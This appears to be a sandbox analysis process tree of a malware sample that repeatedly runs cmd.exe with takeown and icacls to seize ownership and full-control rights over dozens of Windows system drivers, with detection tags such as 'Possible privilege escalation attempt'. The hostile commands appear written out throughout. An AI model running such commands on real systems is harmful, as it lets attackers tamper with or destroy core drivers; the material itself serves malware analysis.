"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\serial.sys && icacls C:\Windows\System32\drivers\serial.sys /grant "%username%:F" && exit
PID:6556

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\serial.sys
    PID:6720

    C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\drivers\serial.sys /grant "Admin:F"
    PID:6776

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sermouse.sys && icacls C:\Windows\System32\drivers\sermouse.sys /grant "%username%:F" && exit
PID:6596

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\sermouse.sys
    PID:6700

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sffdisk.sys && icacls C:\Windows\System32\drivers\sffdisk.sys /grant "%username%:F" && exit
PID:6636

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\sffdisk.sys
    PID:6812

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sffp_mmc.sys && icacls C:\Windows\System32\drivers\sffp_mmc.sys /grant "%username%:F" && exit
PID:6672

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\sffp_mmc.sys
    - Modifies file permissions
    PID:6896

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sffp_sd.sys && icacls C:\Windows\System32\drivers\sffp_sd.sys /grant "%username%:F" && exit
PID:6708

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\sffp_sd.sys
    PID:6920

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sfloppy.sys && icacls C:\Windows\System32\drivers\sfloppy.sys /grant "%username%:F" && exit
PID:6748

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\sfloppy.sys
    PID:6932

    C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\drivers\sfloppy.sys /grant "Admin:F"
    PID:7036

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sisraid2.sys && icacls C:\Windows\System32\drivers\sisraid2.sys /grant "%username%:F" && exit
PID:6792

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\sisraid2.sys
    - Modifies file permissions
    PID:6948

    C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\drivers\sisraid2.sys /grant "Admin:F"
    PID:7028

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sisraid4.sys && icacls C:\Windows\System32\drivers\sisraid4.sys /grant "%username%:F" && exit
PID:6836

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\sisraid4.sys
    PID:6940

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\smb.sys && icacls C:\Windows\System32\drivers\smb.sys /grant "%username%:F" && exit
PID:6860

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\smb.sys
    - Suspicious use of AdjustPrivilegeToken
    PID:6996

    C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\drivers\smb.sys /grant "Admin:F"
    PID:7108

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\smclib.sys && icacls C:\Windows\System32\drivers\smclib.sys /grant "%username%:F" && exit
PID:6888

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\smclib.sys
    PID:5076

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\spldr.sys && icacls C:\Windows\System32\drivers\spldr.sys /grant "%username%:F" && exit
PID:6956

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\spldr.sys
    - Possible privilege escalation attempt
    PID:5572

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\spsys.sys && icacls C:\Windows\System32\drivers\spsys.sys /grant "%username%:F" && exit
PID:6984

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\spsys.sys
    - Modifies file permissions
    PID:6240

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sr9lbsiiph8afw.sys && icacls C:\Windows\System32\drivers\sr9lbsiiph8afw.sys /grant "%username%:F" && exit
PID:7020

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\sr9lbsiiph8afw.sys
    - Possible privilege escalation attempt
    PID:6352

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\srv.sys && icacls C:\Windows\System32\drivers\srv.sys /grant "%username%:F" && exit
PID:7072

    C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers\srv.sys
    - Possible privilege escalation attempt
    - Suspicious use of AdjustPrivilegeToken
    PID:6372

    C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\drivers\srv.sys /grant "Admin:F"
    - Modifies file permissions
    PID:2872

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\srv2.sys && icacls C:\Windows\System32\drivers\srv2.sys /grant "%username%:F" && exit
PID:7100
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\srv2.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6396
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\srv2.sys /grant "Admin:F"3⤵PID:6488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\srvnet.sys && icacls C:\Windows\System32\drivers\srvnet.sys /grant "%username%:F" && exit2⤵PID:7132
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\srvnet.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6152
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\srvnet.sys /grant "Admin:F"3⤵PID:6148
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\stexstor.sys && icacls C:\Windows\System32\drivers\stexstor.sys /grant "%username%:F" && exit2⤵PID:5432
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\stexstor.sys3⤵
- Modifies file permissions
PID:6280
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\stexstor.sys /grant "Admin:F"3⤵PID:6420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\storport.sys && icacls C:\Windows\System32\drivers\storport.sys /grant "%username%:F" && exit2⤵PID:6212
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\storport.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6292
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\storvsc.sys && icacls C:\Windows\System32\drivers\storvsc.sys /grant "%username%:F" && exit2⤵PID:5180
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\storvsc.sys3⤵PID:6548
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\storvsc.sys /grant "Admin:F"3⤵PID:6656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\stream.sys && icacls C:\Windows\System32\drivers\stream.sys /grant "%username%:F" && exit2⤵PID:6304
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\stream.sys3⤵PID:6720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\swenum.sys && icacls C:\Windows\System32\drivers\swenum.sys /grant "%username%:F" && exit2⤵PID:6436
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\swenum.sys3⤵
- Modifies file permissions
PID:6948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Synth3dVsc.sys && icacls C:\Windows\System32\drivers\Synth3dVsc.sys /grant "%username%:F" && exit2⤵PID:6576
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\Synth3dVsc.sys3⤵
- Modifies file permissions
PID:6920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tape.sys && icacls C:\Windows\System32\drivers\tape.sys /grant "%username%:F" && exit2⤵PID:6648
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tape.sys3⤵PID:7084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tcpip.sys && icacls C:\Windows\System32\drivers\tcpip.sys /grant "%username%:F" && exit2⤵PID:6664
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tcpip.sys3⤵PID:6792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tcpipreg.sys && icacls C:\Windows\System32\drivers\tcpipreg.sys /grant "%username%:F" && exit2⤵PID:6880
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tcpipreg.sys3⤵PID:5076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tdi.sys && icacls C:\Windows\System32\drivers\tdi.sys /grant "%username%:F" && exit2⤵PID:6940
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tdi.sys3⤵PID:7080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tdpipe.sys && icacls C:\Windows\System32\drivers\tdpipe.sys /grant "%username%:F" && exit2⤵PID:6808
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tdpipe.sys3⤵PID:6268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tdtcp.sys && icacls C:\Windows\System32\drivers\tdtcp.sys /grant "%username%:F" && exit2⤵PID:7160
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tdtcp.sys3⤵
- Modifies file permissions
PID:6368
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tdx.sys && icacls C:\Windows\System32\drivers\tdx.sys /grant "%username%:F" && exit2⤵PID:6928
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tdx.sys3⤵PID:6280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\termdd.sys && icacls C:\Windows\System32\drivers\termdd.sys /grant "%username%:F" && exit2⤵PID:5616
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\termdd.sys3⤵
- Possible privilege escalation attempt
PID:7100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\terminpt.sys && icacls C:\Windows\System32\drivers\terminpt.sys /grant "%username%:F" && exit2⤵PID:6352
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\terminpt.sys3⤵PID:7132
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tssecsrv.sys && icacls C:\Windows\System32\drivers\tssecsrv.sys /grant "%username%:F" && exit2⤵PID:6508
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tssecsrv.sys3⤵PID:6440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\TsUsbFlt.sys && icacls C:\Windows\System32\drivers\TsUsbFlt.sys /grant "%username%:F" && exit2⤵PID:6528
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\TsUsbFlt.sys3⤵PID:5152
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\TsUsbGD.sys && icacls C:\Windows\System32\drivers\TsUsbGD.sys /grant "%username%:F" && exit2⤵PID:2872
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\TsUsbGD.sys3⤵
- Modifies file permissions
PID:7080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tsusbhub.sys && icacls C:\Windows\System32\drivers\tsusbhub.sys /grant "%username%:F" && exit2⤵PID:6688
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tsusbhub.sys3⤵PID:7124
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tunnel.sys && icacls C:\Windows\System32\drivers\tunnel.sys /grant "%username%:F" && exit2⤵PID:6816
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tunnel.sys3⤵PID:6240
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\UAGP35.SYS && icacls C:\Windows\System32\drivers\UAGP35.SYS /grant "%username%:F" && exit2⤵PID:7000
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\UAGP35.SYS3⤵
- Modifies file permissions
PID:6192
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\udfs.sys && icacls C:\Windows\System32\drivers\udfs.sys /grant "%username%:F" && exit2⤵PID:6952
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\udfs.sys3⤵PID:6292
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ULIAGPKX.SYS && icacls C:\Windows\System32\drivers\ULIAGPKX.SYS /grant "%username%:F" && exit2⤵PID:6372
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ULIAGPKX.SYS3⤵PID:7124
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\umbus.sys && icacls C:\Windows\System32\drivers\umbus.sys /grant "%username%:F" && exit2⤵PID:6200
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\umbus.sys3⤵PID:6608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\umpass.sys && icacls C:\Windows\System32\drivers\umpass.sys /grant "%username%:F" && exit2⤵PID:6804
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\umpass.sys3⤵PID:6316
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usb8023.sys && icacls C:\Windows\System32\drivers\usb8023.sys /grant "%username%:F" && exit2⤵PID:7016
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usb8023.sys3⤵PID:7184
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\USBCAMD2.sys && icacls C:\Windows\System32\drivers\USBCAMD2.sys /grant "%username%:F" && exit2⤵PID:6532
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\USBCAMD2.sys3⤵
- Modifies file permissions
PID:7240
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbccgp.sys && icacls C:\Windows\System32\drivers\usbccgp.sys /grant "%username%:F" && exit2⤵PID:6608
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbccgp.sys3⤵PID:7284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbcir.sys && icacls C:\Windows\System32\drivers\usbcir.sys /grant "%username%:F" && exit2⤵PID:7192
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbcir.sys3⤵PID:7324
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbd.sys && icacls C:\Windows\System32\drivers\usbd.sys /grant "%username%:F" && exit2⤵PID:7224
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbd.sys3⤵PID:7368
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbehci.sys && icacls C:\Windows\System32\drivers\usbehci.sys /grant "%username%:F" && exit2⤵PID:7264
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbehci.sys3⤵
- Modifies file permissions
PID:7404
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbhub.sys && icacls C:\Windows\System32\drivers\usbhub.sys /grant "%username%:F" && exit2⤵PID:7304
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbhub.sys3⤵
- Possible privilege escalation attempt
PID:7452
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbohci.sys && icacls C:\Windows\System32\drivers\usbohci.sys /grant "%username%:F" && exit2⤵PID:7344
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbohci.sys3⤵PID:7532
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\usbohci.sys /grant "Admin:F"3⤵PID:7616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbport.sys && icacls C:\Windows\System32\drivers\usbport.sys /grant "%username%:F" && exit2⤵PID:7376
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbport.sys3⤵
- Modifies file permissions
PID:7500
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbprint.sys && icacls C:\Windows\System32\drivers\usbprint.sys /grant "%username%:F" && exit2⤵PID:7424
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbprint.sys3⤵PID:7540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbrpm.sys && icacls C:\Windows\System32\drivers\usbrpm.sys /grant "%username%:F" && exit2⤵PID:7464
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbrpm.sys3⤵
- Possible privilege escalation attempt
PID:7564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\USBSTOR.SYS && icacls C:\Windows\System32\drivers\USBSTOR.SYS /grant "%username%:F" && exit2⤵PID:7492
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\USBSTOR.SYS3⤵PID:7640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbuhci.sys && icacls C:\Windows\System32\drivers\usbuhci.sys /grant "%username%:F" && exit2⤵PID:7524
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbuhci.sys3⤵PID:7808
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vdrvroot.sys && icacls C:\Windows\System32\drivers\vdrvroot.sys /grant "%username%:F" && exit2⤵PID:7572
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\vdrvroot.sys3⤵
- Possible privilege escalation attempt
PID:7832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vga.sys && icacls C:\Windows\System32\drivers\vga.sys /grant "%username%:F" && exit2⤵PID:7604
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\vga.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:7820
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\vga.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:7868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vgapnp.sys && icacls C:\Windows\System32\drivers\vgapnp.sys /grant "%username%:F" && exit2⤵PID:7648
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\vgapnp.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:7860
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\vgapnp.sys /grant "Admin:F"3⤵PID:7944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vhdmp.sys && icacls C:\Windows\System32\drivers\vhdmp.sys /grant "%username%:F" && exit2⤵PID:7672
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\vhdmp.sys3⤵PID:7884
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\vhdmp.sys /grant "Admin:F"3⤵PID:7936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\viaide.sys && icacls C:\Windows\System32\drivers\viaide.sys /grant "%username%:F" && exit2⤵PID:7708
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\viaide.sys3⤵PID:7924
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\viaide.sys /grant "Admin:F"3⤵PID:7964
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\videoprt.sys && icacls C:\Windows\System32\drivers\videoprt.sys /grant "%username%:F" && exit2⤵PID:7760
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\videoprt.sys3⤵
- Possible privilege escalation attempt
PID:7996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vmbus.sys && icacls C:\Windows\System32\drivers\vmbus.sys /grant "%username%:F" && exit2⤵PID:7788
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\vmbus.sys3⤵
- Possible privilege escalation attempt
PID:8040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\VMBusHID.sys && icacls C:\Windows\System32\drivers\VMBusHID.sys /grant "%username%:F" && exit2⤵PID:7848
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\VMBusHID.sys3⤵
- Possible privilege escalation attempt
PID:8084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vms3cap.sys && icacls C:\Windows\System32\drivers\vms3cap.sys /grant "%username%:F" && exit2⤵PID:7904
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\vms3cap.sys3⤵PID:8096
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\vms3cap.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:8112
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vmstorfl.sys && icacls C:\Windows\System32\drivers\vmstorfl.sys /grant "%username%:F" && exit2⤵PID:7976
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\vmstorfl.sys3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:8144
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\volmgr.sys && icacls C:\Windows\System32\drivers\volmgr.sys /grant "%username%:F" && exit2⤵PID:8024
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\volmgr.sys3⤵PID:8168
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\volmgrx.sys && icacls C:\Windows\System32\drivers\volmgrx.sys /grant "%username%:F" && exit2⤵PID:8064
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\volmgrx.sys3⤵PID:7236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\volsnap.sys && icacls C:\Windows\System32\drivers\volsnap.sys /grant "%username%:F" && exit2⤵PID:8124
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\volsnap.sys3⤵PID:7328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vsmraid.sys && icacls C:\Windows\System32\drivers\vsmraid.sys /grant "%username%:F" && exit2⤵PID:8180
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\vsmraid.sys3⤵PID:7364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vwifibus.sys && icacls C:\Windows\System32\drivers\vwifibus.sys /grant "%username%:F" && exit2⤵PID:7184
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\vwifibus.sys3⤵PID:7500
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vwififlt.sys && icacls C:\Windows\System32\drivers\vwififlt.sys /grant "%username%:F" && exit2⤵PID:7248
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\vwififlt.sys3⤵PID:7552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vwifimp.sys && icacls C:\Windows\System32\drivers\vwifimp.sys /grant "%username%:F" && exit2⤵PID:7392
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\vwifimp.sys3⤵
- Possible privilege escalation attempt
PID:7624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\wacompen.sys && icacls C:\Windows\System32\drivers\wacompen.sys /grant "%username%:F" && exit2⤵PID:7296
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\wacompen.sys3⤵PID:7820
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\wacompen.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:7604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\wanarp.sys && icacls C:\Windows\System32\drivers\wanarp.sys /grant "%username%:F" && exit2⤵PID:7564
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\wanarp.sys3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:7292
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\wanarp.sys /grant "Admin:F"3⤵PID:7812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\watchdog.sys && icacls C:\Windows\System32\drivers\watchdog.sys /grant "%username%:F" && exit2⤵PID:7620
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\watchdog.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:7692
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\watchdog.sys /grant "Admin:F"3⤵PID:7824
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\wd.sys && icacls C:\Windows\System32\drivers\wd.sys /grant "%username%:F" && exit2⤵PID:7872
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\wd.sys3⤵
- Possible privilege escalation attempt
PID:7744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Wdf01000.sys && icacls C:\Windows\System32\drivers\Wdf01000.sys /grant "%username%:F" && exit2⤵PID:7912
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\Wdf01000.sys3⤵PID:8036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\WdfLdr.sys && icacls C:\Windows\System32\drivers\WdfLdr.sys /grant "%username%:F" && exit2⤵PID:7944
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\WdfLdr.sys3⤵PID:7972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\wfplwf.sys && icacls C:\Windows\System32\drivers\wfplwf.sys /grant "%username%:F" && exit2⤵PID:7968
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\wfplwf.sys3⤵PID:8136
-
-
-
